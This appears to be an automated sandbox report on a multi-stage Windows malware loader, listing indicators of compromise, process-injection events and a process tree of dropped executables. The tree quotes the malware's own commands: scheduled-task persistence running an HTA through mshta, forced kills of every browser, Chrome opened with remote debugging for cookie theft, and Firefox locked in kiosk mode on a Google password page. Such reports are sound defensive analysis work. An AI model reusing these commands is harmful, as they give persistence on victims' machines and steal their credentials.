1460	taskkill.exe
4060	taskkill.exe
5096	taskkill.exe
3120	taskkill.exe

Modifies data under HKEY_USERS 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\Local Settings	firefox.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2424	schtasks.exe
3064	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3288	2341120afd619b888c8316c0a91d39b8.exe
3288	2341120afd619b888c8316c0a91d39b8.exe
3292	skotes.exe
3292	skotes.exe
3520	skotes.exe
3520	skotes.exe
4468	jROrnzx.exe
4468	jROrnzx.exe
4468	jROrnzx.exe
4468	jROrnzx.exe
3064	qFqSpAp.exe
3064	qFqSpAp.exe
3064	qFqSpAp.exe
3064	qFqSpAp.exe
1764	c7d681fd29.exe
1764	c7d681fd29.exe
1764	c7d681fd29.exe
1764	c7d681fd29.exe
1764	c7d681fd29.exe
1764	c7d681fd29.exe
1764	c7d681fd29.exe
1764	c7d681fd29.exe
1764	c7d681fd29.exe
1764	c7d681fd29.exe
3916	61996fd75d.exe
3916	61996fd75d.exe
3204	12695a2f10.exe
3204	12695a2f10.exe
768	2e0f8c0da0.exe
768	2e0f8c0da0.exe
768	2e0f8c0da0.exe
768	2e0f8c0da0.exe
768	2e0f8c0da0.exe
768	2e0f8c0da0.exe
4968	73f7781714.exe
4968	73f7781714.exe
3572	d71a31942b.exe
3572	d71a31942b.exe
4404	powershell.exe
4404	powershell.exe
3572	d71a31942b.exe
3572	d71a31942b.exe
6016	TempSL0HXJPEGQNGXOFNQWZEKYZUGBPYRN6N.EXE
6016	TempSL0HXJPEGQNGXOFNQWZEKYZUGBPYRN6N.EXE
6044	chrome.exe
6044	chrome.exe
1196	Bjkm5hE.exe
1196	Bjkm5hE.exe
1196	Bjkm5hE.exe
1196	Bjkm5hE.exe
536	d2YQIJa.exe
536	d2YQIJa.exe
536	d2YQIJa.exe
536	d2YQIJa.exe
536	d2YQIJa.exe
536	d2YQIJa.exe
5584	DTQCxXZ.exe
5584	DTQCxXZ.exe
5584	DTQCxXZ.exe
5584	DTQCxXZ.exe
468	23364180fc.exe
468	23364180fc.exe
3348	Ta3ZyUR.exe
3348	Ta3ZyUR.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs

pid	Process
6044	chrome.exe
6044	chrome.exe
6044	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4104	msedge.exe
4104	msedge.exe
4104	msedge.exe
4104	msedge.exe

Suspicious use of AdjustPrivilegeToken 28 IoCs

description	pid	Process
Token: SeDebugPrivilege	3120	taskkill.exe
Token: SeDebugPrivilege	1456	taskkill.exe
Token: SeDebugPrivilege	4404	powershell.exe
Token: SeDebugPrivilege	1460	taskkill.exe
Token: SeDebugPrivilege	4060	taskkill.exe
Token: SeDebugPrivilege	5096	taskkill.exe
Token: SeDebugPrivilege	4928	firefox.exe
Token: SeDebugPrivilege	4928	firefox.exe
Token: SeShutdownPrivilege	6044	chrome.exe
Token: SeCreatePagefilePrivilege	6044	chrome.exe
Token: SeDebugPrivilege	6016	powershell.exe
Token: SeDebugPrivilege	5904	powershell.exe
Token: SeDebugPrivilege	3820	powershell.exe
Token: SeShutdownPrivilege	4948	chrome.exe
Token: SeCreatePagefilePrivilege	4948	chrome.exe
Token: SeShutdownPrivilege	4948	chrome.exe
Token: SeCreatePagefilePrivilege	4948	chrome.exe
Token: SeDebugPrivilege	2052	36ef8d9a36.exe
Token: SeShutdownPrivilege	4948	chrome.exe
Token: SeCreatePagefilePrivilege	4948	chrome.exe
Token: SeShutdownPrivilege	4948	chrome.exe
Token: SeCreatePagefilePrivilege	4948	chrome.exe
Token: SeShutdownPrivilege	4948	chrome.exe
Token: SeCreatePagefilePrivilege	4948	chrome.exe
Token: SeShutdownPrivilege	4948	chrome.exe
Token: SeCreatePagefilePrivilege	4948	chrome.exe
Token: SeShutdownPrivilege	4948	chrome.exe
Token: SeCreatePagefilePrivilege	4948	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3288	2341120afd619b888c8316c0a91d39b8.exe
4928	amnew.exe
3572	d71a31942b.exe
3572	d71a31942b.exe
3572	d71a31942b.exe
3572	d71a31942b.exe
1308	5d20b033cd.exe
3572	d71a31942b.exe
1308	5d20b033cd.exe
1308	5d20b033cd.exe
3572	d71a31942b.exe
3572	d71a31942b.exe
3572	d71a31942b.exe
4928	firefox.exe
4928	firefox.exe
4928	firefox.exe
4928	firefox.exe
4928	firefox.exe
4928	firefox.exe
4928	firefox.exe
4928	firefox.exe
4928	firefox.exe
4928	firefox.exe
4928	firefox.exe
4928	firefox.exe
4928	firefox.exe
4928	firefox.exe
4928	firefox.exe
4928	firefox.exe
4928	firefox.exe
4928	firefox.exe
4928	firefox.exe
4928	firefox.exe
4928	firefox.exe
3572	d71a31942b.exe
3572	d71a31942b.exe
3572	d71a31942b.exe
3572	d71a31942b.exe
6044	chrome.exe
6044	chrome.exe
6044	chrome.exe
6044	chrome.exe
6044	chrome.exe
6044	chrome.exe
6044	chrome.exe
6044	chrome.exe
6044	chrome.exe
6044	chrome.exe
6044	chrome.exe
6044	chrome.exe
6044	chrome.exe
6044	chrome.exe
6044	chrome.exe
6044	chrome.exe
6044	chrome.exe
6044	chrome.exe
6044	chrome.exe
6044	chrome.exe
6044	chrome.exe
6044	chrome.exe
6044	chrome.exe
6044	chrome.exe
6044	chrome.exe
6044	chrome.exe

Suspicious use of SendNotifyMessage 35 IoCs

pid	Process
3572	d71a31942b.exe
3572	d71a31942b.exe
3572	d71a31942b.exe
3572	d71a31942b.exe
1308	5d20b033cd.exe
3572	d71a31942b.exe
1308	5d20b033cd.exe
1308	5d20b033cd.exe
3572	d71a31942b.exe
3572	d71a31942b.exe
3572	d71a31942b.exe
4928	firefox.exe
4928	firefox.exe
4928	firefox.exe
4928	firefox.exe
4928	firefox.exe
4928	firefox.exe
4928	firefox.exe
4928	firefox.exe
4928	firefox.exe
4928	firefox.exe
4928	firefox.exe
4928	firefox.exe
4928	firefox.exe
4928	firefox.exe
4928	firefox.exe
4928	firefox.exe
4928	firefox.exe
4928	firefox.exe
4928	firefox.exe
4928	firefox.exe
3572	d71a31942b.exe
3572	d71a31942b.exe
3572	d71a31942b.exe
3572	d71a31942b.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4928	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3288 wrote to memory of 3292	3288	2341120afd619b888c8316c0a91d39b8.exe	82
PID 3288 wrote to memory of 3292	3288	2341120afd619b888c8316c0a91d39b8.exe	82
PID 3288 wrote to memory of 3292	3288	2341120afd619b888c8316c0a91d39b8.exe	82
PID 3292 wrote to memory of 4928	3292	skotes.exe	83
PID 3292 wrote to memory of 4928	3292	skotes.exe	83
PID 3292 wrote to memory of 4928	3292	skotes.exe	83
PID 4928 wrote to memory of 2068	4928	amnew.exe	84
PID 4928 wrote to memory of 2068	4928	amnew.exe	84
PID 4928 wrote to memory of 2068	4928	amnew.exe	84
PID 3292 wrote to memory of 2708	3292	skotes.exe	86
PID 3292 wrote to memory of 2708	3292	skotes.exe	86
PID 3292 wrote to memory of 2708	3292	skotes.exe	86
PID 2708 wrote to memory of 4468	2708	jROrnzx.exe	88
PID 2708 wrote to memory of 4468	2708	jROrnzx.exe	88
PID 2708 wrote to memory of 4468	2708	jROrnzx.exe	88
PID 2708 wrote to memory of 4468	2708	jROrnzx.exe	88
PID 2708 wrote to memory of 4468	2708	jROrnzx.exe	88
PID 2708 wrote to memory of 4468	2708	jROrnzx.exe	88
PID 2708 wrote to memory of 4468	2708	jROrnzx.exe	88
PID 2708 wrote to memory of 4468	2708	jROrnzx.exe	88
PID 2708 wrote to memory of 4468	2708	jROrnzx.exe	88
PID 3292 wrote to memory of 3064	3292	skotes.exe	94
PID 3292 wrote to memory of 3064	3292	skotes.exe	94
PID 3292 wrote to memory of 3064	3292	skotes.exe	94
PID 2068 wrote to memory of 1764	2068	futors.exe	95
PID 2068 wrote to memory of 1764	2068	futors.exe	95
PID 2068 wrote to memory of 1764	2068	futors.exe	95
PID 3292 wrote to memory of 3916	3292	skotes.exe	96
PID 3292 wrote to memory of 3916	3292	skotes.exe	96
PID 3292 wrote to memory of 3916	3292	skotes.exe	96
PID 2068 wrote to memory of 3204	2068	futors.exe	97
PID 2068 wrote to memory of 3204	2068	futors.exe	97
PID 2068 wrote to memory of 3204	2068	futors.exe	97
PID 3292 wrote to memory of 768	3292	skotes.exe	98
PID 3292 wrote to memory of 768	3292	skotes.exe	98
PID 3292 wrote to memory of 768	3292	skotes.exe	98
PID 3292 wrote to memory of 4968	3292	skotes.exe	99
PID 3292 wrote to memory of 4968	3292	skotes.exe	99
PID 3292 wrote to memory of 4968	3292	skotes.exe	99
PID 3292 wrote to memory of 3572	3292	skotes.exe	100
PID 3292 wrote to memory of 3572	3292	skotes.exe	100
PID 3292 wrote to memory of 3572	3292	skotes.exe	100
PID 3572 wrote to memory of 3120	3572	d71a31942b.exe	101
PID 3572 wrote to memory of 3120	3572	d71a31942b.exe	101
PID 3572 wrote to memory of 3120	3572	d71a31942b.exe	101
PID 3916 wrote to memory of 4844	3916	61996fd75d.exe	103
PID 3916 wrote to memory of 4844	3916	61996fd75d.exe	103
PID 3916 wrote to memory of 4844	3916	61996fd75d.exe	103
PID 3916 wrote to memory of 4844	3916	61996fd75d.exe	103
PID 3204 wrote to memory of 3080	3204	12695a2f10.exe	104
PID 3204 wrote to memory of 3080	3204	12695a2f10.exe	104
PID 3204 wrote to memory of 3080	3204	12695a2f10.exe	104
PID 3916 wrote to memory of 4844	3916	61996fd75d.exe	103
PID 3916 wrote to memory of 4844	3916	61996fd75d.exe	103
PID 3916 wrote to memory of 4844	3916	61996fd75d.exe	103
PID 3204 wrote to memory of 3080	3204	12695a2f10.exe	104
PID 3916 wrote to memory of 4844	3916	61996fd75d.exe	103
PID 3204 wrote to memory of 3080	3204	12695a2f10.exe	104
PID 3916 wrote to memory of 4844	3916	61996fd75d.exe	103
PID 3204 wrote to memory of 3080	3204	12695a2f10.exe	104
PID 3916 wrote to memory of 4844	3916	61996fd75d.exe	103
PID 3292 wrote to memory of 1308	3292	skotes.exe	105
PID 3292 wrote to memory of 1308	3292	skotes.exe	105
PID 3292 wrote to memory of 1308	3292	skotes.exe	105

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\2341120afd619b888c8316c0a91d39b8.exe
"C:\Users\Admin\AppData\Local\Temp\2341120afd619b888c8316c0a91d39b8.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3288
- C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
  "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Downloads MZ/PE file
  - Checks BIOS information in registry
  - Checks computer location settings
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Adds Run key to start application
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:3292
- - C:\Users\Admin\AppData\Local\Temp\1085407001\amnew.exe
    "C:\Users\Admin\AppData\Local\Temp\1085407001\amnew.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:4928
  - - C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
      "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
      4⤵
      Downloads MZ/PE file
      Checks computer location settings
      Executes dropped EXE
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2068
    - - C:\Users\Admin\AppData\Local\Temp\10006970101\c7d681fd29.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10006970101\c7d681fd29.exe"
        5⤵
        Enumerates VirtualBox registry keys
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:1764
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
        6⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:6044
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fffd2a5cc40,0x7fffd2a5cc4c,0x7fffd2a5cc58
        7⤵
        
        PID:6072
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2032,i,18031963974455073233,7547567255078769720,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2028 /prefetch:2
        7⤵
        
        PID:2140
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1848,i,18031963974455073233,7547567255078769720,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2520 /prefetch:3
        7⤵
        
        PID:2052
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2152,i,18031963974455073233,7547567255078769720,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2624 /prefetch:8
        7⤵
        
        PID:3348
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3184,i,18031963974455073233,7547567255078769720,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3192 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:4088
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3200,i,18031963974455073233,7547567255078769720,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3256 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:5036
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4556,i,18031963974455073233,7547567255078769720,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4580 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:4768
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4724,i,18031963974455073233,7547567255078769720,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4636 /prefetch:8
        7⤵
        
        PID:5544
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4600,i,18031963974455073233,7547567255078769720,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4616 /prefetch:8
        7⤵
        
        PID:5316
      - C:\Users\Admin\AppData\Local\Temp\service123.exe
        
        "C:\Users\Admin\AppData\Local\Temp\service123.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:2604
      - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
        6⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:2424
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1764 -s 1320
        6⤵
        Program crash
        
        PID:808
    - - C:\Users\Admin\AppData\Local\Temp\10006980101\12695a2f10.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10006980101\12695a2f10.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:3204
      - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
        
        "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
        6⤵
        Downloads MZ/PE file
        System Location Discovery: System Language Discovery
        
        PID:3080
- - C:\Users\Admin\AppData\Local\Temp\1085408001\jROrnzx.exe
    "C:\Users\Admin\AppData\Local\Temp\1085408001\jROrnzx.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2708
  - - C:\Users\Admin\AppData\Local\Temp\1085408001\jROrnzx.exe
      "C:\Users\Admin\AppData\Local\Temp\1085408001\jROrnzx.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:4468
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2708 -s 968
      4⤵
      Program crash
      PID:388
- - C:\Users\Admin\AppData\Local\Temp\1085409001\qFqSpAp.exe
    "C:\Users\Admin\AppData\Local\Temp\1085409001\qFqSpAp.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:3064
- - C:\Users\Admin\AppData\Local\Temp\1085410001\61996fd75d.exe
    "C:\Users\Admin\AppData\Local\Temp\1085410001\61996fd75d.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:3916
  - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      4⤵
      Downloads MZ/PE file
      System Location Discovery: System Language Discovery
      PID:4844
- - C:\Users\Admin\AppData\Local\Temp\1085411001\2e0f8c0da0.exe
    "C:\Users\Admin\AppData\Local\Temp\1085411001\2e0f8c0da0.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:768
- - C:\Users\Admin\AppData\Local\Temp\1085412001\73f7781714.exe
    "C:\Users\Admin\AppData\Local\Temp\1085412001\73f7781714.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:4968
- - C:\Users\Admin\AppData\Local\Temp\1085413001\d71a31942b.exe
    "C:\Users\Admin\AppData\Local\Temp\1085413001\d71a31942b.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:3572
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM firefox.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3120
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM chrome.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1456
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM msedge.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1460
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM opera.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4060
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM brave.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5096
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
      4⤵
      PID:4136
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        5⤵
        Checks processor information in registry
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:4928
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1908 -parentBuildID 20240401114208 -prefsHandle 1852 -prefMapHandle 1844 -prefsLen 27368 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9efd7bf6-9e9c-4b1a-9ff3-91a2562fdd7a} 4928 "\\.\pipe\gecko-crash-server-pipe.4928" gpu
        6⤵
        
        PID:32
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2420 -parentBuildID 20240401114208 -prefsHandle 2388 -prefMapHandle 2384 -prefsLen 28288 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9785eeb8-0489-4c9a-b1ed-0e061e22d2e7} 4928 "\\.\pipe\gecko-crash-server-pipe.4928" socket
        6⤵
        
        PID:3360
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3264 -childID 1 -isForBrowser -prefsHandle 2620 -prefMapHandle 3236 -prefsLen 22684 -prefMapSize 244628 -jsInitHandle 1152 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5ce8c9e5-453f-478e-90cd-7e3e93f346a4} 4928 "\\.\pipe\gecko-crash-server-pipe.4928" tab
        6⤵
        
        PID:4312
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3728 -childID 2 -isForBrowser -prefsHandle 3716 -prefMapHandle 3712 -prefsLen 32778 -prefMapSize 244628 -jsInitHandle 1152 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c981d78c-294d-44db-9312-4e8830b9d6da} 4928 "\\.\pipe\gecko-crash-server-pipe.4928" tab
        6⤵
        
        PID:4444
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4404 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4408 -prefMapHandle 4384 -prefsLen 32778 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {27bf0134-0f8e-4a7d-8ba4-028bb10eef27} 4928 "\\.\pipe\gecko-crash-server-pipe.4928" utility
        6⤵
        Checks processor information in registry
        
        PID:1828
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5252 -childID 3 -isForBrowser -prefsHandle 4408 -prefMapHandle 5296 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1152 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {db5cc85f-defb-47da-a669-6dc8033be9f3} 4928 "\\.\pipe\gecko-crash-server-pipe.4928" tab
        6⤵
        
        PID:5912
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5524 -childID 4 -isForBrowser -prefsHandle 5600 -prefMapHandle 5596 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1152 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5ec82b04-76b0-4b20-a40a-95ab7e2df135} 4928 "\\.\pipe\gecko-crash-server-pipe.4928" tab
        6⤵
        
        PID:5924
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5508 -childID 5 -isForBrowser -prefsHandle 5736 -prefMapHandle 5740 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1152 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {62c15d20-3181-45af-a62b-c429ea03a2f2} 4928 "\\.\pipe\gecko-crash-server-pipe.4928" tab
        6⤵
        
        PID:5936
- - C:\Users\Admin\AppData\Local\Temp\1085414001\5d20b033cd.exe
    "C:\Users\Admin\AppData\Local\Temp\1085414001\5d20b033cd.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:1308
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn 2LuwLmaOGU1 /tr "mshta C:\Users\Admin\AppData\Local\Temp\KglhUzPJb.hta" /sc minute /mo 25 /ru "Admin" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:100
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn 2LuwLmaOGU1 /tr "mshta C:\Users\Admin\AppData\Local\Temp\KglhUzPJb.hta" /sc minute /mo 25 /ru "Admin" /f
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:3064
  - - C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\KglhUzPJb.hta
      4⤵
      Checks computer location settings
